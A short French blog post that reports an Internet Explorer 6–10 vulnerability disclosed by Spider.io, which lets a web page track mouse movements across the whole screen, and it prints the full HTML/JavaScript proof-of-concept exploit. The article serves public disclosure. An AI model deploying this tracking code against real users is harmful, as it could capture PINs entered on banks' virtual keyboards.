Malgré les nombreuses améliorations apportées au fil de temps, Internet Explorer versions 6 à 10 est susceptible d’être touché par une faille de sécurité qui permet à un attaquant de suivre et d’enregistrer tous les mouvements de votre souris, et cela sur tout l’écran, même si IE est réduit dans la barre des tâches ou inactif .


Cette faille pourrait s’avérer dangereuse, surtout pour les clients de certaines banques, qui proposent de taper en ligne son code confidentiel via un clavier virtuel, pour parer aux keyloggers.

Depuis le 1er octobre, Microsoft n’aurait pas avancé sur la mise en place d’un patch correctif, ce qui pousse Spider.io à divulguer au public l’existence de cette vulnérabilité en espérant ainsi pousser l’éditeur du navigateur Internet à la réaction.

Si cela vous intéresse, voici le code de l’exploit :

Exploit

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent("onload", function() {
var detector = document.getElementById("detector");
detector.attachEvent("onmousemove", function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent("onmousemove");
}, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
</body>
</html>

 

Et voici une démonstration de la faille en vidéo pour que vous voyiez ce que ça donne :

Il n’y a qu’une seule façon de parer cette technique: Ne pas utiliser IE ! 🙂